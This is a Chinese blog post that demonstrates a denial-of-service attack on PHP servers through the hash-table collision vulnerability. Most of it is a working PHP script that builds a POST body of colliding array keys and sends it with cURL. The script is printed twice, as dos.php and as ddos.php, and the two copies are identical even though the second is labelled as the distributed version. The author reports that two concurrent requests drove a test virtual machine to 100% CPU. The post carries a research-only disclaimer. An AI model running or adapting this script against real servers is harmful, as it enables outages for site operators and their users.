通过PHP的hash冲突漏洞进行DDoS攻击


 

声明:本文内容只用于研究学习使用,请勿用于非法行为!

 

 

上回咱说到了最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。

攻击原理:

通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽。

不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。

文件:dos.php

 

 

// 目标地址

// 只要目标地址存在,不用管它是干嘛的

$host = 'http://127.0.0.1/test.php';

 

$data = '';

$size = pow(2, 15);

for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)

{

$data .= '&array[' . $key . ']=0';

}

 

$ret = curl($host, ltrim($data,'&'));

var_dump($ret);

 

 

function curl($url, $post, $timeout = 30){

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);

curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

$output = curl_exec($ch);

if ($output === false) return false;

$info = curl_getinfo($ch);

$http_code = $info['http_code'];

if ($http_code == 404) return false;

curl_close($ch);

return $output;

}

文件:ddos.php

 

 

// 目标地址

// 只要目标地址存在,不用管它是干嘛的

$host = 'http://127.0.0.1/test.php';

 

$data = '';

$size = pow(2, 15);

for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)

{

$data .= '&array[' . $key . ']=0';

}

 

$ret = curl($host, ltrim($data,'&'));

var_dump($ret);

 

 

function curl($url, $post, $timeout = 30){

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);

curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

$output = curl_exec($ch);

if ($output === false) return false;

$info = curl_getinfo($ch);

$http_code = $info['http_code'];

if ($http_code == 404) return false;

curl_close($ch);

return $output;

}

  

虽然我的测试目标服务器是台虚拟机,但仅用了2个并发就使目标机CPU飙到了100%。但是100%的CPU占用并不代表着就已经拒绝服务,点到为止:)


豫ICP备12024565号-1   E-mail:admin@hlc8.com